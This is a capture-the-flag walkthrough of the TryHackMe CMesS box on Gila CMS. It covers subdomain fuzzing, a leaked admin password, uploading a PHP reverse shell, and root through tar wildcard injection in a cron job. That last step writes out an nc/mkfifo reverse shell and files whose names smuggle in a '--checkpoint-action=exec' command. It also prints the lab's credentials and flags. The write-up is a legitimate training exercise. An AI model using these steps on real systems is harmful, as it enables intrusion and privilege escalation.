Can you root this Gila CMS box?

Please add cmess.thm to /etc/hosts

Please also note that this box does not require brute forcing!

#1 – Compromise this machine and obtain user.txt

Hint: Have you tried fuzzing for subdomains?

First thing is to add cmess.thm in our /etc/hosts file.

Nmap reveals that 2 ports are open on the target: SSH and HTTP, on their standard ports.

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a robots.txt file that reveals some hidden locations:

unknown@localhost:/data/documents/challenges/TryHackMe$ curl -s
User-agent: *
Disallow: /src/
Disallow: /themes/
Disallow: /lib/

When browsing the home page, it reveals that the website is built upon GilaCMS ( gobuster discovers several other hidden locations:

$gobuster dir -u http://cmess.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url: http://cmess.thm/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/09/09 11:31:35 Starting gobuster

The most interesting locations are probably /login and /admin, but we don’t have credentials, and are instructed not to brute force the autentication.

The hint though recommends to check subdomains; let’s use wfuzz for that purpose:

$ ┌─[user@parrot-virtual]─[~/ptd]
└──╼ $wfuzz -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.4.5 - The Web Fuzzer                         *

Target: http://cmess.thm/
Total requests: 4997

ID           Response   Lines    Word     Chars       Payload                                             

000000019:   200        30 L     104 W    934 Ch      "dev"                                               

Total time: 68.70782
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 72.72825

We have discovered a hidden dev.cmess.thm subdomain. Let’s add it to our /etc/hosts file:

$ cat /etc/hosts
[REDACTED] cmess.thm dev.cmess.thm

Now, let’s see what we can get from this subdomain:

$ curl -s dev.cmess.thm | html2text
***** Development Log *****
**** andre@cmess.thm ****
Have you guys fixed the bug that was found on live?

**** support@cmess.thm ****
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're
hoping to patch it in the upcoming patch!

**** support@cmess.thm ****
Update! We have had to delay the patch due to unforeseen circumstances

**** andre@cmess.thm ****
That's ok, can you guys reset my password if you get a moment, I seem to be
unable to get onto the admin panel.

**** support@cmess.thm ****
Your password has been reset. Here: KPFTN_f2yxe%

We are provided with an email address and a password. Now you can log in:

Once logged in, go to Content > File Manager.

Now, download a PHP shell (, add a file named shell.php in the assets directory and put the content of the PHP reverse shell (don’t forget to modify your IP and port).

Open a listener on your machine (rlwrap nc -nlvp 4444), on the port you selected, and browse http://cmess.thm/assets/shell.php. You should now be logged in as www-data.

Lateral move to Andre

If you list the /home folder, you’ll notice that andre is a user. Let’s try a lateral move. After searching a bit (you can use linenum or linpeas to help), you’ll notice that Andre’s password has been backup’ed in a hidden file under the /opt directory:

www-data@cmess:/opt$ cat /opt/.password.bak
cat /opt/.password.bak
andres backup password

Connect to SSH with andre:UQfsdCB7aAP6 and get the user flag.

andre@cmess:~$ cat user.txt 

User flag: thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}

#2 – Escalate your privileges and obtain root.txt

Now, let’s get root. There is an interesting crontab job running every 2 minutes, executed by root:

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

As you can see, this command is using the wildcard (*) to select all files located under /home/andre/backup and compress them with tar. Having a look at GTFOBins ( tells us that we can take advantage from this mistake.

Indeed, because of the wildcard, we can create files that will be interpreted as options for the tar command, to ultimately execute something similar to this:

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Let’s do it:

$ cat > /home/andre/backup/rev << EOF
rm /tmp/f
mkfifo /tmp/f
cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f
$ echo "" > "/home/andre/backup/--checkpoint=1"
$ echo "" > "/home/andre/backup/--checkpoint-action=exec=sh rev"

Now, let’s open a listener and wait for the next batch.

$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt

Root flag: thm{9f85b7fdeb2cf96985bf5761a93546a2}



Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *